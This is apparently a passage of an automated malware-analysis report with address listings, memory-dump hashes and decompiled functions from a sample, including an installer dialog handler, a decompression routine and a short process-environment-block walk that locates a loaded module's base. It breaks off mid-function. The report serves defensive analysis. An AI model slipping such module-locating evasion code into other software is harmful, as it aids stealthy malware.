                                                          0x00000000
                                                          0x00406e2d
                                                          0x00406e2d
                                                          0x00406e30
                                                          0x00406e35
                                                          0x00406e37
                                                          0x00406e3d
                                                          0x00406e3f
                                                          0x00406e54
                                                          0x00406e56
                                                          0x00406e56
                                                          0x00406e41
                                                          0x00406e47
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e4b
                                                          0x00406e58
                                                          0x00406e5c
                                                          0x00406e5f
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e68
                                                          0x00406e68
                                                          0x00406e68
                                                          0x00406e6a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e70
                                                          0x00406e70
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e9d
                                                          0x00406ea0
                                                          0x00406ea6
                                                          0x00406eab
                                                          0x00406eb1
                                                          0x00406eb7
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ec5
                                                          0x00406ecb
                                                          0x00406ecb
                                                          0x00406ebe
                                                          0x00406ec0
                                                          0x00406ec2
                                                          0x00406ec2
                                                          0x00406ecd
                                                          0x00406ed3
                                                          0x00406ed5
                                                          0x00406ed8
                                                          0x00406eda
                                                          0x00406ee0
                                                          0x00406ee2
                                                          0x00406ee4
                                                          0x00406ee6
                                                          0x00406ee8
                                                          0x00406eeb
                                                          0x00406ef4
                                                          0x00406ef7
                                                          0x00406ef7
                                                          0x00406eed
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef0
                                                          0x00406eeb
                                                          0x00406ee2
                                                          0x00406ef9
                                                          0x00406efb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406efb
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e80
                                                          0x00406e86
                                                          0x00406e88
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e8a
                                                          0x00406e8a
                                                          0x00406e8c
                                                          0x00406e8e
                                                          0x00406e97
                                                          0x00406e97
                                                          0x00406e90
                                                          0x00406e90
                                                          0x00406e93
                                                          0x00406e93
                                                          0x00406e99
                                                          0x00406e9b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f01
                                                          0x00406f01
                                                          0x00406f06
                                                          0x00406f08
                                                          0x00406f09
                                                          0x00406f0a
                                                          0x00406f0b
                                                          0x00406f11
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1c
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f2e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f33
                                                          0x00406f33
                                                          0x00406f36
                                                          0x00406f39
                                                          0x00406f3b
                                                          0x00406fd2
                                                          0x00406fd2
                                                          0x00406fd5
                                                          0x00406fd7
                                                          0x00406fd8
                                                          0x00406fd9
                                                          0x00406fdc
                                                          0x00000000
                                                          0x00406fdc
                                                          0x00406f41
                                                          0x00406f41
                                                          0x00406f47
                                                          0x00406f49
                                                          0x00406f6e
                                                          0x00406f71
                                                          0x00406f77
                                                          0x00406f7c
                                                          0x00406f82
                                                          0x00406f88
                                                          0x00406f8a
                                                          0x00406f8d
                                                          0x00406f96
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f8f
                                                          0x00406f91
                                                          0x00406f93
                                                          0x00406f93
                                                          0x00406f9e
                                                          0x00406fa4
                                                          0x00406fa6
                                                          0x00406fa9
                                                          0x00406fab
                                                          0x00406fb1
                                                          0x00406fb3
                                                          0x00406fb5
                                                          0x00406fb7
                                                          0x00406fb9
                                                          0x00406fbc
                                                          0x00406fc5
                                                          0x00406fc8
                                                          0x00406fc8
                                                          0x00406fbe
                                                          0x00406fbe
                                                          0x00406fc1
                                                          0x00406fc1
                                                          0x00406fbc
                                                          0x00406fb3
                                                          0x00406fca
                                                          0x00406fcc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fcc
                                                          0x00406f4b
                                                          0x00406f4b
                                                          0x00406f51
                                                          0x00406f57
                                                          0x00406f59
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f5b
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a5f
                                                          0x00000000
                                                          0x00406a5f
                                                          0x004069a4
                                                          0x00406965
                                                          0x00407049
                                                          0x0040704c
                                                          0x0040704e
                                                          0x00407057
                                                          0x0040705d
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                          • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                          • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                          • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                          				signed int _v8;
                                                          				unsigned int _v12;
                                                          				signed int _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				intOrPtr* _v32;
                                                          				signed int* _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				void _v116;
                                                          				signed int _v176;
                                                          				signed int _v180;
                                                          				signed int _v240;
                                                          				signed int _t166;
                                                          				signed int _t168;
                                                          				intOrPtr _t175;
                                                          				signed int _t181;
                                                          				void* _t182;
                                                          				intOrPtr _t183;
                                                          				signed int* _t184;
                                                          				signed int _t186;
                                                          				signed int _t187;
                                                          				signed int* _t189;
                                                          				signed int _t190;
                                                          				intOrPtr* _t191;
                                                          				intOrPtr _t192;
                                                          				signed int _t193;
                                                          				signed int _t195;
                                                          				signed int _t200;
                                                          				signed int _t205;
                                                          				void* _t207;
                                                          				short _t208;
                                                          				signed char _t222;
                                                          				signed int _t224;
                                                          				signed int _t225;
                                                          				signed int* _t232;
                                                          				signed int _t233;
                                                          				signed int _t234;
                                                          				void* _t235;
                                                          				signed int _t236;
                                                          				signed int _t244;
                                                          				signed int _t246;
                                                          				signed int _t251;
                                                          				signed int _t254;
                                                          				signed int _t256;
                                                          				signed int _t259;
                                                          				signed int _t262;
                                                          				void* _t263;
                                                          				void* _t264;
                                                          				signed int _t267;
                                                          				intOrPtr _t269;
                                                          				intOrPtr _t271;
                                                          				signed int _t274;
                                                          				intOrPtr* _t275;
                                                          				unsigned int _t276;
                                                          				void* _t277;
                                                          				signed int _t278;
                                                          				intOrPtr* _t279;
                                                          				signed int _t281;
                                                          				intOrPtr _t282;
                                                          				intOrPtr _t283;
                                                          				signed int* _t284;
                                                          				signed int _t286;
                                                          				signed int _t287;
                                                          				signed int _t288;
                                                          				signed int _t296;
                                                          				signed int* _t297;
                                                          				intOrPtr _t298;
                                                          				void* _t299;
                                                          
                                                          				_t278 = _a8;
                                                          				_t187 = 0x10;
                                                          				memset( &_v116, 0, _t187 << 2);
                                                          				_t189 = _a4;
                                                          				_t233 = _t278;
                                                          				do {
                                                          					_t166 =  *_t189;
                                                          					_t189 =  &(_t189[1]);
                                                          					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                          					_t233 = _t233 - 1;
                                                          				} while (_t233 != 0);
                                                          				if(_v116 != _t278) {
                                                          					_t279 = _a28;
                                                          					_t267 =  *_t279;
                                                          					_t190 = 1;
                                                          					_a28 = _t267;
                                                          					_t234 = 0xf;
                                                          					while(1) {
                                                          						_t168 = 0;
                                                          						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                          							break;
                                                          						}
                                                          						_t190 = _t190 + 1;
                                                          						if(_t190 <= _t234) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v8 = _t190;
                                                          					if(_t267 < _t190) {
                                                          						_a28 = _t190;
                                                          					}
                                                          					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                          						_t234 = _t234 - 1;
                                                          						if(_t234 != 0) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v28 = _t234;
                                                          					if(_a28 > _t234) {
                                                          						_a28 = _t234;
                                                          					}
                                                          					 *_t279 = _a28;
                                                          					_t181 = 1 << _t190;
                                                          					while(_t190 < _t234) {
                                                          						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                          						if(_t182 < 0) {
                                                          							L64:
                                                          							return _t168 | 0xffffffff;
                                                          						}
                                                          						_t190 = _t190 + 1;
                                                          						_t181 = _t182 + _t182;
                                                          					}
                                                          					_t281 = _t234 << 2;
                                                          					_t191 = _t299 + _t281 - 0x70;
                                                          					_t269 =  *_t191;
                                                          					_t183 = _t181 - _t269;
                                                          					_v52 = _t183;
                                                          					if(_t183 < 0) {
                                                          						goto L64;
                                                          					}
                                                          					_v176 = _t168;
                                                          					 *_t191 = _t269 + _t183;
                                                          					_t192 = 0;
                                                          					_t235 = _t234 - 1;
                                                          					if(_t235 == 0) {
                                                          						L21:
                                                          						_t184 = _a4;
                                                          						_t271 = 0;
                                                          						do {
                                                          							_t193 =  *_t184;
                                                          							_t184 =  &(_t184[1]);
                                                          							if(_t193 != _t168) {
                                                          								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                          								_t236 =  *_t232;
                                                          								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
                                                          								 *_t232 = _t236 + 1;
                                                          							}
                                                          							_t271 = _t271 + 1;
                                                          						} while (_t271 < _a8);
                                                          						_v16 = _v16 | 0xffffffff;
                                                          						_v40 = _v40 & 0x00000000;
                                                          						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                          						_t195 = _v8;
                                                          						_t186 =  ~_a28;
                                                          						_v12 = _t168;
                                                          						_v180 = _t168;
                                                          						_v36 = 0x42d6a8;
                                                          						_v240 = _t168;
                                                          						if(_t195 > _v28) {
                                                          							L62:
                                                          							_t168 = 0;
                                                          							if(_v52 == 0 || _v28 == 1) {
                                                          								return _t168;
                                                          							} else {
                                                          								goto L64;
                                                          							}
                                                          						}
                                                          						_v44 = _t195 - 1;
                                                          						_v32 = _t299 + _t195 * 4 - 0x70;
                                                          						do {
                                                          							_t282 =  *_v32;
                                                          							if(_t282 == 0) {
                                                          								goto L61;
                                                          							}
                                                          							while(1) {
                                                          								_t283 = _t282 - 1;
                                                          								_t200 = _a28 + _t186;
                                                          								_v48 = _t283;
                                                          								_v24 = _t200;
                                                          								if(_v8 <= _t200) {
                                                          									goto L45;
                                                          								}
                                                          								L31:
                                                          								_v20 = _t283 + 1;
                                                          								do {
                                                          									_v16 = _v16 + 1;
                                                          									_t296 = _v28 - _v24;
                                                          									if(_t296 > _a28) {
                                                          										_t296 = _a28;
                                                          									}
                                                          									_t222 = _v8 - _v24;
                                                          									_t254 = 1 << _t222;
                                                          									if(1 <= _v20) {
                                                          										L40:
                                                          										_t256 =  *_a36;
                                                          										_t168 = 1 << _t222;
                                                          										_v40 = 1;
                                                          										_t274 = _t256 + 1;
                                                          										if(_t274 > 0x5a0) {
                                                          											goto L64;
                                                          										}
                                                          									} else {
                                                          										_t275 = _v32;
                                                          										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                          										if(_t222 >= _t296) {
                                                          											goto L40;
                                                          										}
                                                          										while(1) {
                                                          											_t222 = _t222 + 1;
                                                          											if(_t222 >= _t296) {
                                                          												goto L40;
                                                          											}
                                                          											_t275 = _t275 + 4;
                                                          											_t264 = _t263 + _t263;
                                                          											_t175 =  *_t275;
                                                          											if(_t264 <= _t175) {
                                                          												goto L40;
                                                          											}
                                                          											_t263 = _t264 - _t175;
                                                          										}
                                                          										goto L40;
                                                          									}
                                                          									_t168 = _a32 + _t256 * 4;
                                                          									_t297 = _t299 + _v16 * 4 - 0xec;
                                                          									 *_a36 = _t274;
                                                          									_t259 = _v16;
                                                          									 *_t297 = _t168;
                                                          									if(_t259 == 0) {
                                                          										 *_a24 = _t168;
                                                          									} else {
                                                          										_t276 = _v12;
                                                          										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                          										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                          										_a5 = _a28;
                                                          										_a4 = _t222;
                                                          										_t262 = _t276 >> _t186;
                                                          										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                          										 *(_t298 + _t262 * 4) = _a4;
                                                          									}
                                                          									_t224 = _v24;
                                                          									_t186 = _t224;
                                                          									_t225 = _t224 + _a28;
                                                          									_v24 = _t225;
                                                          								} while (_v8 > _t225);
                                                          								L45:
                                                          								_t284 = _v36;
                                                          								_a5 = _v8 - _t186;
                                                          								if(_t284 < 0x42d6a8 + _a8 * 4) {
                                                          									_t205 =  *_t284;
                                                          									if(_t205 >= _a12) {
                                                          										_t207 = _t205 - _a12 + _t205 - _a12;
                                                          										_v36 =  &(_v36[1]);
                                                          										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                          										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                          									} else {
                                                          										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                          										_t208 =  *_t284;
                                                          										_v36 =  &(_t284[1]);
                                                          									}
                                                          									_a6 = _t208;
                                                          								} else {
                                                          									_a4 = 0xc0;
                                                          								}
                                                          								_t286 = 1 << _v8 - _t186;
                                                          								_t244 = _v12 >> _t186;
                                                          								while(_t244 < _v40) {
                                                          									 *(_t168 + _t244 * 4) = _a4;
                                                          									_t244 = _t244 + _t286;
                                                          								}
                                                          								_t287 = _v12;
                                                          								_t246 = 1 << _v44;
                                                          								while((_t287 & _t246) != 0) {
                                                          									_t287 = _t287 ^ _t246;
                                                          									_t246 = _t246 >> 1;
                                                          								}
                                                          								_t288 = _t287 ^ _t246;
                                                          								_v20 = 1;
                                                          								_v12 = _t288;
                                                          								_t251 = _v16;
                                                          								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                          									L60:
                                                          									if(_v48 != 0) {
                                                          										_t282 = _v48;
                                                          										_t283 = _t282 - 1;
                                                          										_t200 = _a28 + _t186;
                                                          										_v48 = _t283;
                                                          										_v24 = _t200;
                                                          										if(_v8 <= _t200) {
                                                          											goto L45;
                                                          										}
                                                          										goto L31;
                                                          									}
                                                          									break;
                                                          								} else {
                                                          									goto L58;
                                                          								}
                                                          								do {
                                                          									L58:
                                                          									_t186 = _t186 - _a28;
                                                          									_t251 = _t251 - 1;
                                                          								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                          								_v16 = _t251;
                                                          								goto L60;
                                                          							}
                                                          							L61:
                                                          							_v8 = _v8 + 1;
                                                          							_v32 = _v32 + 4;
                                                          							_v44 = _v44 + 1;
                                                          						} while (_v8 <= _v28);
                                                          						goto L62;
                                                          					}
                                                          					_t277 = 0;
                                                          					do {
                                                          						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                          						_t277 = _t277 + 4;
                                                          						_t235 = _t235 - 1;
                                                          						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                          					} while (_t235 != 0);
                                                          					goto L21;
                                                          				}
                                                          				 *_a24 =  *_a24 & 0x00000000;
                                                          				 *_a28 =  *_a28 & 0x00000000;
                                                          				return 0;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                          • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                          • Instruction ID: c83d43bbd1de8bcb717f39e87eab509d47d38ecff7cf32caca116237773e1f12
                                                          • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                          • Instruction Fuzzy Hash: 8B014C78A10208EFCB90DF99D680A9DBBF4EB08220F1085A6E958E7711D330EE50DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E10001000() {
                                                          
                                                          				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                          			}




                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.223616623.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.223600653.0000000010000000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.223633299.0000000010002000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                          				struct HWND__* _v8;
                                                          				struct HWND__* _v12;
                                                          				long _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v28;
                                                          				signed char* _v32;
                                                          				int _v36;
                                                          				signed int _v44;
                                                          				int _v48;
                                                          				signed int* _v60;
                                                          				signed char* _v64;
                                                          				signed int _v68;
                                                          				long _v72;
                                                          				void* _v76;
                                                          				intOrPtr _v80;
                                                          				intOrPtr _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t203;
                                                          				intOrPtr _t206;
                                                          				intOrPtr _t207;
                                                          				long _t212;
                                                          				signed int _t216;
                                                          				signed int _t227;
                                                          				void* _t230;
                                                          				void* _t231;
                                                          				int _t237;
                                                          				long _t242;
                                                          				long _t243;
                                                          				signed int _t244;
                                                          				signed int _t250;
                                                          				signed int _t252;
                                                          				signed char _t253;
                                                          				signed char _t259;
                                                          				void* _t264;
                                                          				void* _t266;
                                                          				signed char* _t284;
                                                          				signed char _t285;
                                                          				long _t290;
                                                          				signed int _t300;
                                                          				signed int _t308;
                                                          				signed char* _t316;
                                                          				int _t320;
                                                          				int _t321;
                                                          				signed int* _t322;
                                                          				int _t323;
                                                          				long _t324;
                                                          				signed int _t325;
                                                          				long _t327;
                                                          				int _t328;
                                                          				signed int _t329;
                                                          				void* _t331;
                                                          
                                                          				_v12 = GetDlgItem(_a4, 0x3f9);
                                                          				_v8 = GetDlgItem(_a4, 0x408);
                                                          				_t331 = SendMessageA;
                                                          				_v24 =  *0x42f468;
                                                          				_v28 =  *0x42f434 + 0x94;
                                                          				_t320 = 0x10;
                                                          				if(_a8 != 0x110) {
                                                          					L23:
                                                          					if(_a8 != 0x405) {
                                                          						_t298 = _a16;
                                                          					} else {
                                                          						_a12 = 0;
                                                          						_t298 = 1;
                                                          						_a8 = 0x40f;
                                                          						_a16 = 1;
                                                          					}
                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                          						_v16 = _t298;
                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                          							if(( *0x42f43d & 0x00000002) != 0) {
                                                          								L41:
                                                          								if(_v16 != 0) {
                                                          									_t242 = _v16;
                                                          									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                          										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                          									}
                                                          									_t243 = _v16;
                                                          									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                          										_t298 = _v24;
                                                          										_t244 =  *(_t243 + 0x5c);
                                                          										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                          											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                          										} else {
                                                          											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L48;
                                                          							}
                                                          							if(_a8 == 0x413) {
                                                          								L33:
                                                          								_t298 = 0 | _a8 != 0x00000413;
                                                          								_t250 = E00404ACE(_v8, _a8 != 0x413);
                                                          								_t325 = _t250;
                                                          								if(_t325 >= 0) {
                                                          									_t99 = _v24 + 8; // 0x8
                                                          									_t298 = _t250 * 0x418 + _t99;
                                                          									_t252 =  *_t298;
                                                          									if((_t252 & 0x00000010) == 0) {
                                                          										if((_t252 & 0x00000040) == 0) {
                                                          											_t253 = _t252 ^ 0x00000001;
                                                          										} else {
                                                          											_t259 = _t252 ^ 0x00000080;
                                                          											if(_t259 >= 0) {
                                                          												_t253 = _t259 & 0x000000fe;
                                                          											} else {
                                                          												_t253 = _t259 | 0x00000001;
                                                          											}
                                                          										}
                                                          										 *_t298 = _t253;
                                                          										E0040117D(_t325);
                                                          										_a12 = _t325 + 1;
                                                          										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
                                                          										_a8 = 0x40f;
                                                          									}
                                                          								}
                                                          								goto L41;
                                                          							}
                                                          							_t298 = _a16;
                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                          								goto L41;
                                                          							}
                                                          							goto L33;
                                                          						} else {
                                                          							goto L48;
                                                          						}
                                                          					} else {
                                                          						L48:
                                                          						if(_a8 != 0x111) {
                                                          							L56:
                                                          							if(_a8 == 0x200) {
                                                          								SendMessageA(_v8, 0x200, 0, 0);
                                                          							}
                                                          							if(_a8 == 0x40b) {
                                                          								_t230 =  *0x42a874;
                                                          								if(_t230 != 0) {
                                                          									ImageList_Destroy(_t230);
                                                          								}
                                                          								_t231 =  *0x42a888;
                                                          								if(_t231 != 0) {
                                                          									GlobalFree(_t231);
                                                          								}
                                                          								 *0x42a874 = 0;
                                                          								 *0x42a888 = 0;
                                                          								 *0x42f4a0 = 0;
                                                          							}
                                                          							if(_a8 != 0x40f) {
                                                          								L90:
                                                          								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
                                                          									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                          									ShowWindow(_v8, _t321);
                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                          								}
                                                          								goto L93;
                                                          							} else {
                                                          								E004011EF(_t298, 0, 0);
                                                          								_t203 = _a12;
                                                          								if(_t203 != 0) {
                                                          									if(_t203 != 0xffffffff) {
                                                          										_t203 = _t203 - 1;
                                                          									}
                                                          									_push(_t203);
                                                          									_push(8);
                                                          									E00404B4E();
                                                          								}
                                                          								if(_a16 == 0) {
                                                          									L75:
                                                          									E004011EF(_t298, 0, 0);
                                                          									_v36 =  *0x42a888;
                                                          									_t206 =  *0x42f468;
                                                          									_v64 = 0xf030;
                                                          									_v24 = 0;
                                                          									if( *0x42f46c <= 0) {
                                                          										L86:
                                                          										if( *0x42f42c == 4) {
                                                          											InvalidateRect(_v8, 0, 1);
                                                          										}
                                                          										_t207 =  *0x42ebfc; // 0x569dca
                                                          										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                          											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
                                                          										}
                                                          										goto L90;
                                                          									}
                                                          									_t322 = _t206 + 8;
                                                          									do {
                                                          										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                          										if(_t212 != 0) {
                                                          											_t300 =  *_t322;
                                                          											_v72 = _t212;
                                                          											_v76 = 8;
                                                          											if((_t300 & 0x00000001) != 0) {
                                                          												_v76 = 9;
                                                          												_v60 =  &(_t322[4]);
                                                          												_t322[0] = _t322[0] & 0x000000fe;
                                                          											}
                                                          											if((_t300 & 0x00000040) == 0) {
                                                          												_t216 = (_t300 & 0x00000001) + 1;
                                                          												if((_t300 & 0x00000010) != 0) {
                                                          													_t216 = _t216 + 3;
                                                          												}
                                                          											} else {
                                                          												_t216 = 3;
                                                          											}
                                                          											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                          											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                          											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                          										}
                                                          										_v24 = _v24 + 1;
                                                          										_t322 =  &(_t322[0x106]);
                                                          									} while (_v24 <  *0x42f46c);
                                                          									goto L86;
                                                          								} else {
                                                          									_t323 = E004012E2( *0x42a888);
                                                          									E00401299(_t323);
                                                          									_t227 = 0;
                                                          									_t298 = 0;
                                                          									if(_t323 <= 0) {
                                                          										L74:
                                                          										SendMessageA(_v12, 0x14e, _t298, 0);
                                                          										_a16 = _t323;
                                                          										_a8 = 0x420;
                                                          										goto L75;
                                                          									} else {
                                                          										goto L71;
                                                          									}
                                                          									do {
                                                          										L71:
                                                          										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                          											_t298 = _t298 + 1;
                                                          										}
                                                          										_t227 = _t227 + 1;
                                                          									} while (_t227 < _t323);
                                                          									goto L74;
                                                          								}
                                                          							}
                                                          						}
                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                          							goto L93;
                                                          						} else {
                                                          							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                          							if(_t237 == 0xffffffff) {
                                                          								goto L93;
                                                          							}
                                                          							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                          							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                          								_t324 = 0x20;
                                                          							}
                                                          							E00401299(_t324);
                                                          							SendMessageA(_a4, 0x420, 0, _t324);
                                                          							_a12 = _a12 | 0xffffffff;
                                                          							_a16 = 0;
                                                          							_a8 = 0x40f;
                                                          							goto L56;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					_v36 = 0;
                                                          					 *0x42f4a0 = _a4;
                                                          					_v20 = 2;
